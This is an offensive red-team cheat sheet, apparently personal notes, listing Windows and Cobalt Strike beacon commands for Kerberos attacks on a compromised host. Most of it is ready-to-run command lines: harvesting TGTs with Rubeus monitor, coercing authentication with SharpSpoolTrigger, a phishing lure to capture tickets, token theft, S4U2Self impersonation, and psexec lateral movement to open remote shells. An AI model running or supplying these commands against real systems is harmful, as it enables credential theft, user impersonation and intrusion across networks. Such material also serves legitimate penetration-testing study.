Commands Cheat Sheet
Windows Command Line tools
Debugging & Helper commands.
View error message
[-] could not upload file: 32 - ERROR_SHARING_VIOLATION
C:\>net helpmsg 32
The process cannot access the file because it is being used by another process.
Recon & Enumeration (Windows)
List named pipes (SMB)
PS C:\> ls \\.\pipe\
tcp connections
PS> netstat -anop tcp
PS> netstat -anop tcp | findstr 1337
Kerberos Tickets
Extract TGT's from compromised host
Rubeus
beacon> execute-assembly C:\Tools\Rubeus.exe monitor /interval:10 /nowrap
beacon> jobkill
Request NetOnly Kerberos Ticket
Rubeus
Below will open a command prompt with the NetOnly ticket. We can then use steal_token <PID> and impersonate that user.
beacon> execute-assembly C:\Tools\Rubeus.exe createnetonly /
program:C:\Windows\System32\cmd.exe /ticket<user-ticket>
Coerce Host Authentication
If we compromised a host, we can try to force an authentication attempt or phish a user to harvest TGTs.
SharpSpoolTriggers
beacon> execute-assembly C:\Tools\Rubeus.exe monitor /interval:10 /nowrap
beacon> execute-assembly C:\Tools\SharpSpoolTrigger.exe <target-hostname> <compromised-hostname>
Phishing
We can use Rubeus monitor and send an email to trick a user into authenticating or clicking on a host. The interaction can be as simple as including dir \\comromised-host
Using Kerberos Tickets to spawn remote shell
TGT
// Rubeus triage, dump or monitor to get a TGT.
beacon> execute-assembly C:\Tools\Rubeus.exe createnetonly
/program:C:\Windows\System32\cmd.exe /ticket:<remote host users TGT>
beacon> steal_token <PID>
beacon> jump psexec64 <remote host FQDN> smb
TGS (S4U2Self Trick)
// Rubeus triage, dump or monitor to get TGT
// Get TGS from TGT
Method 1: Get TGS, create sacrificial login, and steal token.
beacon> execute-assembly C:\Tools\Rubeus.exe s4u /impersonateuser:cfoxy /self
/altservice:cifs/<host-FQDN> /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap
beacon> execute-assembly C:\Tools\Rubeus\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
/domain:ROTTA /username:cfoxy /password:FakePass /ticket:doIFyD[...]MuaW8=
beacon> steal_token <PID>
beacon> jump psexec64 <remote host FQDN> smb
------------------------------------------------------------------------------------------
Method 2: (Create sacrificial login session first and pass to s4u
beacon> execute-assembly C:\Tools\Rubeus\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
/domain:ROTTA /username:cfoxy /password:FakePass /ticket:doIFyD[...]MuaW8=
beacon> execute-assembly C:\Tools\Rubeus.exe s4u /impersonateuser:cfoxy /self
/altservice:cifs/<host-FQDN> /user:dc-2$ /ticket:doIFuj[...]lDLklP /self /ptt
beacon> run klist
beacon> ls \\<remote-host-FQDN>
beacon> jump psexec64 <remote host FQDN> smb
Last updated